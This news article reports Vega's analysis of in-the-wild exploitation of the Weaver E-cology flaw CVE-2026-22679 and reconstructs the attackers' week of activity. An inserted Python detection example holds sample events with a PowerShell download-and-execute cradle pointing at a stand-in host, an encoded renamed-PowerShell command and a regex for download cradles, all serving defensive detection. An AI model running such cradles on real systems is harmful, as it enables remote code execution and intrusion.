IT Brief New Zealand - Technology news for CIOs & IT decision-makers
Vega spots Weaver E-cology attacks within days of patch

Tue, 5th May 2026
Joseph Gabriel Lagonsin, News Editor

Vega has identified active exploitation of the Weaver E-cology remote code execution flaw CVE-2026-22679, with activity beginning within five days of the vendor patch.

The finding adds a detailed case study of the vulnerability, which affects Weaver E-cology 10.0, a widely used collaboration and office management platform. The flaw has a CVSS score of 9.8 and allows unauthenticated command execution through an exposed debug endpoint.

Researchers said the vulnerable endpoint passes attacker-controlled parameters to a command execution helper without authentication or input validation. As a result, attackers can run operating system commands through the application's Java virtual machine.

Vega said the earliest evidence it observed predates broader public reporting of attacks in the wild, highlighting how quickly attackers can move from patch analysis to live exploitation.

Its analysis also extends beyond the initial compromise. Using endpoint detection and response telemetry, Vega reconstructed roughly a week of attacker activity on a single host, offering a view of how operators behaved after gaining access.

Attack chain

The sequence began with checks designed to confirm remote code execution. Attackers used ping callbacks tied to Goby attack-surface mapping infrastructure and relied on the application itself to return command output.

They then made repeated attempts to deliver payloads through PowerShell-based downloads, but endpoint defences quarantined each retrieved executable.

The activity then shifted across several techniques. Attackers disguised files as legitimate software, including an executable named to imitate Node Version Manager, and tried to deploy a Windows Installer package called fanwei0324.msi that appeared to reference the target software and attack date.

That installation attempt failed. Vega also found that the operators copied and renamed a legitimate Microsoft-signed PowerShell binary in an apparent effort to evade process-name-based detections.

Further efforts focused on fileless execution. Researchers said the attackers repeatedly tried to pull remote PowerShell scripts into memory using both obfuscated and clear-text commands.

Throughout the intrusion, they executed common reconnaissance commands, including whoami, ipconfig and tasklist, through the same vulnerable endpoint. That approach let them work through discrete HTTP request-response exchanges rather than maintaining a persistent shell or deploying an agent.
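The attack chain above is reconstructed from EDR telemetry, and each stage leaves a process-creation signal a defender can test for: the application's JVM spawning a shell or reconnaissance tool, PowerShell download or in-memory cradles on the command line, and a PowerShell binary running under a different file name. The following detection logic is an added example, not Vega's tooling or any part of the report; the event format, the E-cology install path and the parent process name java.exe are assumptions, and the events are constructed.

```python
import re
from pathlib import PureWindowsPath

# Constructed EDR process-creation events (not from the report). The install
# path and the JVM parent name are assumptions made for illustration only.
SAMPLE_EVENTS = [
    {"parent": r"C:\ecology\jre\bin\java.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami", "orig_name": "Cmd.Exe"},
    {"parent": r"C:\ecology\jre\bin\java.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c ping -n 1 callback.example.invalid", "orig_name": "Cmd.Exe"},
    {"parent": r"C:\ecology\jre\bin\java.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/a.ps1')",
     "orig_name": "PowerShell.EXE"},
    # Copy of powershell.exe renamed to look like Node Version Manager.
    {"parent": r"C:\ecology\jre\bin\java.exe", "image": r"C:\Users\Public\nvm.exe",
     "cmdline": "nvm.exe -nop -enc UExBQ0VIT0xERVI=", "orig_name": "PowerShell.EXE"},
    # Benign: an interactive user running ipconfig from Explorer.
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c ipconfig", "orig_name": "Cmd.Exe"},
]

# Children a web application's JVM has no legitimate reason to launch.
SHELL_OR_RECON = {"cmd.exe", "powershell.exe", "pwsh.exe", "whoami.exe",
                  "ipconfig.exe", "tasklist.exe", "ping.exe"}
# Download cradles, in-memory execution and encoded-command switches.
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                       r"\biex\b|invoke-expression|\s-e(nc|ncodedcommand)?\s", re.I)

def basename(path):
    return PureWindowsPath(path).name.lower()

def classify(event):
    """Return the names of the detection rules a single event matches."""
    hits = []
    if basename(event["parent"]) == "java.exe" and basename(event["image"]) in SHELL_OR_RECON:
        hits.append("jvm_spawned_shell_or_recon")
    if CRADLE_RE.search(event["cmdline"]):
        hits.append("powershell_download_or_inmemory")
    # Version-resource original name survives a copy-and-rename of the binary.
    if event["orig_name"].lower() == "powershell.exe" and basename(event["image"]) != "powershell.exe":
        hits.append("renamed_powershell_binary")
    return hits

def analyze(events):
    """Index every event that matched at least one rule, with its rule names."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```

The last sample event shows why the JVM-parent condition matters: the same reconnaissance command run by an interactive user produces no alert.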

No foothold

A notable feature of the case was the absence of a durable post-compromise presence. Vega found no evidence that the attackers successfully established persistence, installed secondary payloads or created follow-on process chains.

Instead, the debug endpoint itself served as the command channel for the full sequence of actions, from validation and discovery to payload delivery attempts. That made the intrusion more iterative than a conventional compromise, in which attackers quickly gain a stable foothold.

Researchers said defensive controls created repeated friction at each stage. Endpoint protections blocked executable downloads, obfuscated scripts and in-memory loaders, preventing the attackers from turning access into a more entrenched position.

Daniel Messing, Cyber Threat Intelligence Lead at Vega, described the case as a clear example of how quickly exploitation can begin after a patch becomes available.

"This activity shows that attackers aren't waiting around. They're exploiting critical flaws within days of a patch being released. In this case, we saw them repeatedly try to get code execution on a target, cycling through payloads, changing techniques, and even attempting to disguise their activity. What makes this particularly notable is that they didn't need a foothold in the traditional sense - the exposed debug endpoint effectively gave them a built-in way to run commands on the system," Messing said.

Infrastructure used

Vega identified several pieces of infrastructure involved in the operation, including servers used to host executables and MSI packages, endpoints used to deliver PowerShell scripts, and callback systems associated with the Goby scanning framework.

Overlap with Goby-linked infrastructure suggests shared tooling or reuse of publicly available resources, but does not support attribution to a specific threat actor.

The case underlines a practical challenge for defenders. Even when a fix exists, the gap between patch release and exploitation may be short, while attackers can keep probing the same target through repeated low-level attempts if an exposed execution path remains available.

In this instance, Vega's reconstruction suggests that repeated command execution through the application was enough to sustain a week-long intrusion attempt, even though every effort to deploy a more permanent payload was blocked.